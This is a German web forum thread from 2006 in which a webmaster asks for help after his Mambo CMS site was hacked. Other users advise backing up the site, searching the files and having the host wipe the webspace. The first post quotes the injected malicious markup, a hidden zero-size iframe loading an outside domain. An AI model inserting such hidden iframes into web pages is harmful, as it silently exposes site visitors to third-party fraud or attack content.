-
Da hat sich was eingenistet.
Hallo, vor ein paar Tagen wurde meine Webpräsens gehackt (Mambo 4..5.3h), weil ich auf einer Website ein php-script hatte, welches Sicherheitslücken aufwies (kein CMS) und dadurch hat man sich Zugriff auf mein root-Verzeichnis verschaft und einige änderungen vorgenommen. Die meisten Hacks habe ich gefunden. Aber folgende Zeile nistet sich auf jede generierte Seite am Ende ein:
<html><iframe src=http://www.kgeba.com/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>
Ich habe schon alle php-Seien durchforstet, sowie auch die Datenbank. Ich finde aber nicht die Herkunft dieser Zeile.
Hat wer ne Idee, wo ich noch suchen muss. Oder lösch ich einfach mal radikal Mambo?
Grüße aus Berlin
Dirk
Geändert von dirktxl (19.06.2006 um 09:52 Uhr)
-
-
Suchen ...
Hallo,
an Deiner Stelle würde ich zuerst ein komplettes Backup runterladen, also alles vom Server und die Datenbank.
Die gesammelten Werke mit einem guten Editor ( z.Bsp. UltraEdit ) nach den gewünschten Suchbegriffen durchsuchen, das sollte Anhaltspunkte liefern.
Unverständlich:
Wenns nix ausmacht alles neu zu machen ist das immer die bessere Lösung.
Nur diesmal absichern ...
Gruß
pala999
-
Erhielt Danksagungen von:
-
Hallo pala999,
das mit dem Backup runterladen und durchsuchen habe ich gemacht und mit Notepad++ durchstöbert und auch was gefunden. Nur leider war ich wohl schon etwas müde und habe in einem anderem CMS auf meinem Webspace die gehackten Index-Dateien bereinigt. Mit dem Ergebnis, dass sich auf dem eingenlichen Ziel-CMS nix geändert hat. Kein Wunder.
Eine Nacht drüber schlafen und mit frischem Geist an die Sache und da habe ich meinen Irrtum entdeckt und das richtige CMS bereinigt.
Wenn das noch mal vorkommt, werde ich hier fragen ob man über FTP nach den geänderten Index-Dateien sowas wie "Suchen und Ersetzen" machen kann. Was der Hacker wohl gemacht hat. :-(
Ich werde von dem bereinigten CMS ein Backup machen und dieses dann, vorausgesetzt es sind zwischendurch keine Änderungen gemacht worden, dieses dann einfach über das gehackte drüber braten.
Vielen Dank noch mal und Grüße aus Berlin
Dirk
-
-
Du solltest viel mehr deinen Webspace komplett durch den Hoster cleanen, sprich löschen lassen und diesen schnellstmöglich informieren. Du suchst ja nur nach Ausgaben und weißt letztendlich gar nicht, was sonst noch alles passiert ist. Jeder richtige Hacker hinterläßt immer ein Backdoor auf deinem System, um immer wieder darauf zuzugreifen. Wahrscheinlich werden von deinem System gerade 1.000.000 Emails an A. Merkel versand.
Die Dateien, sowie die Datenbank kannst du ja sichern und gesichtete und für sicher befundene Teile wieder einspielen. Alles andere wäre unverantwortlich.
Gruß
ec
-
-
Danke für die Info. Das mit dem Webspace Missbrauch betrieben wurde hat mir mein Hoster mitgeteilt und der hat die eingeschleusten Dateien und Ordner gesperrt. Mir selbst ist der Hack nur aufgefallen, weil auf allen Site's die Startseite durch die des Hackers ausgetauscht wurden. Das wie in meinem Fall mein Webspace für Phishing missbraucht wurde, auf den Gedanken wäre ich nie gekommen. Aber wie steht schon in deiner Signatur.... ;-)
Dirk
-
Berechtigungen
- Neue Themen erstellen: Nein
- Themen beantworten: Nein
- Anhänge hochladen: Nein
- Beiträge bearbeiten: Nein
Foren-Regeln
LinkBack URL
About LinkBacks
Zitieren
Lesezeichen